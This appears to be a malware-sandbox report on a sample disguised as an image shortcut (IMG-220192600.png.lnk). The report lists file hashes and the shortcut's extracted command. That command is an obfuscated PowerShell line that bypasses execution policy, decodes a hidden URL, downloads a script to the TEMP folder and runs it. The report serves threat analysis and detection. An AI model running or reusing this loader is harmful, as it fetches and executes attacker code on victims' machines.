Malicious
Malicious
Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
1b0bca05476ba7689ee43bf4a5f6387a
Sha1
5a90e1dd7ca5bcf6e2616e78126e5c1ba29c5723
Sha256
1eeb17e084c1119420e416f0d3944f0a0994412bb502809c629ae196b0ca51d9
Sha384
2586401e84af2036020d81baae8a00e09e8e2cacdd1d520b6152bfbd99901ddede6abdbcad75bd0fb517d628c8980d33
Sha512
8af76cb631374252d2e20fba170df13c158d9799d4428db4bf64bf41583f67c25d18ef74e0981149c1c7c56463b13fdd7224c82c5c0f659927553fc9cf8ec813
SSDeep
192:kUoLfERTEWWAIF+ZGwLtwGxoIVu8WBiglYAwjL60KYF/TB6ZtWOzu8:PC0TEWvACwG59gGAqL60Ko/TB6uZ8
TLSH
0A22B059F6D57BBCD28A10B6DDE502B2831EBF5C33D704F249B70024C0169DEAE4A689
File Structure
1b0bca05476ba7689ee43bf4a5f6387a
Malicious
MP-588161259.mp4
IMG-220192600.png.lnk
Malicious
LNK CommandLine
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -ep bypass -c "$q=[bigint]\"1278167183109023384653565350998996716972168811616\";$f=[bigint]\"641917150208488587904259848153234376482969758704\";$y=$q - $f;while($y -ne 0){$s+=[char]([int]($y -band 128+127));$y=$y -shr 8};iwr $s -OutFile $env:TEMP\w9tKkk.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\w9tKkk.ps1"
1b0bca05476ba7689ee43bf4a5f6387a (10.57 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙